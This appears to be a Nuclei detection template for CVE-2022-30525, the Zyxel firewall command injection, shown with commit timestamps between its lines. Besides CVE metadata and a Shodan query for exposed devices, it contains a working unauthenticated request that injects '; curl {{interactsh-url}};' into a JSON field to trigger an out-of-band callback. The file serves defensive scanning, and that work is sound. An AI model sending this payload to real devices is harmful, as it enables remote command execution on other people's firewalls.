2022-05-13 02:52:42 +00:00
id : CVE-2022-30525
info :
2022-05-20 21:38:52 +00:00
name : Zyxel Firewall - OS Command Injection
2022-05-13 08:46:09 +00:00
author : h1ei1,prajiteshsingh
2022-05-13 02:52:42 +00:00
severity : critical
2022-05-13 08:46:09 +00:00
description : |
2022-05-20 21:38:52 +00:00
An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
2023-09-06 11:59:08 +00:00
remediation : |
Apply the latest security patches or firmware updates provided by Zyxel to mitigate this vulnerability.
2022-05-13 02:52:42 +00:00
reference :
2022-05-13 08:46:09 +00:00
- https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
- https://github.com/rapid7/metasploit-framework/pull/16563
2022-05-17 09:18:12 +00:00
- https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml
2022-05-20 21:38:52 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-30525
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/167176/Zyxel-Remote-Command-Execution.html
2022-05-18 20:58:07 +00:00
classification :
2022-05-24 08:19:30 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-05-18 20:58:07 +00:00
cve-id : CVE-2022-30525
2022-05-24 08:19:30 +00:00
cwe-id : CWE-78
2023-11-21 02:35:29 +00:00
epss-score : 0.97471
epss-percentile : 0.99959
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*
2022-05-18 21:10:42 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : zyxel
product : usg_flex_100w_firmware
2023-09-06 11:59:08 +00:00
shodan-query : title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700"
2023-07-15 16:29:17 +00:00
tags : packetstorm,zyxel,cve,cve2022,firewall,unauth,kev,msf,rce
2022-05-13 02:52:42 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-05-13 02:52:42 +00:00
- raw :
- |
POST /ztp/cgi-bin/handler HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json
2022-05-13 08:46:09 +00:00
{"command" : "setWanPortSt" , "proto" : "dhcp" , "port" : "4" , "vlan_tagged" : "1" , "vlanid" : "5" , "mtu" : "; curl {{interactsh-url}};" , "data" : "hi" }
2022-05-13 02:52:42 +00:00
2022-05-13 08:46:09 +00:00
matchers-condition : and
2022-05-13 02:52:42 +00:00
matchers :
- type : word
part : interactsh_protocol
words :
2022-05-13 08:46:09 +00:00
- "http"
- type : status
status :
- 500
2023-11-21 07:14:20 +00:00
# digest: 490a0046304402204c660227cdb406b7ca2960776f9027411c1a4705d5ef71f432135bef2d3a92d60220666b02d515814fcfd06040ec91234eb763ece2a119eeddb559e244af54366e94:922c64590222798bb761d5b6d8e72950